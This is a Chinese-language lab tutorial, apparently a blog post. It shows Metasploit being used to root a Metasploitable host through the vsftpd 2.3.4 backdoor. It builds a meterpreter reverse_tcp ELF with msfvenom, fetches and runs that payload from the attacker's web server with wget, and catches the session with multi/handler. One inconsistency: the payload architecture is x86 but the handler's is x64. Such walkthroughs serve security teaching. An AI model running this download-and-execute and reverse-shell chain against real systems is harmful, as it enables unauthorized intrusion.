前言
使用metasploit对linux系统进行渗透测试
一、生成攻击载荷
使用msfvenom命令创建一个elf文件
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
将攻击载荷移动到www文件夹下(记得开启apache2服务)
┌──(root💀kali)-[~]
└─# mv pay.elf /var/www/html
二、获取目标主机物理访问权限
1.使用社会工程学获取
2.查看目标主机存在的漏洞进行渗透
这里介绍第二种
①开启postgresql服务,加载msf数据库
②使用nmap扫描目标主机,发现可攻击漏洞
③使用相关模块渗透,获取权限
┌──(root💀kali)-[~]
└─# service postgresql start
┌──(root💀kali)-[~]
└─# service apache2 start
msf6 > db_nmap -sV -u 192.168.1.103
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 12:30 CST
[*] Nmap: Nmap scan report for 192.168.1.103
[*] Nmap: Host is up (0.0027s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
......
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.1 1900 tcp upnp open
192.168.1.101 548 tcp afp filtered
192.168.1.102 8080 tcp tcpwrapped open
192.168.1.103 21 tcp ftp open vsftpd 2.3.4
192.168.1.103 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.103 23 tcp telnet open Linux telnetd
192.168.1.103 25 tcp smtp open Postfix smtpd
192.168.1.103 53 tcp domain open ISC BIND 9.4.2
192.168.1.103 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
....
msf6 >
发现vsftpd2.3.4,这个服务存在漏洞,可以进行渗透(之前的文章详细讲过如何渗透vsftpd2.3.4)
点击查看vsftp2.3.4渗透测试提权小白教程
[*] 192.168.1.103:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.103:21 - USER: 331 Please specify the password.
[+] 192.168.1.103:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.103:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.103:6200) at 2021-05-13 12:37:16 +0800
wget http://192.168.1.113/pay.elf
--06:57:46-- http://192.168.1.113/pay.elf
=> `pay.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
0K 100% 37.10 MB/s
06:57:46 (37.10 MB/s) - `pay.elf' saved [207/207]
chmod 777 pay.elf
./pay.elf
使用wget命令下载文件,修改权限并运行
三、加载主控端handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:5555
[*] Sending stage (3012548 bytes) to 192.168.1.103
等待主控端handler的响应,对linux系统渗透测试完成
总结
本文简单介绍了使用metasploit对linux系统渗透测试提权,获取linux访问权限使用的是常见的vsftpd2.3.4漏洞,紧接着生成主控端,完成提权。仅供学习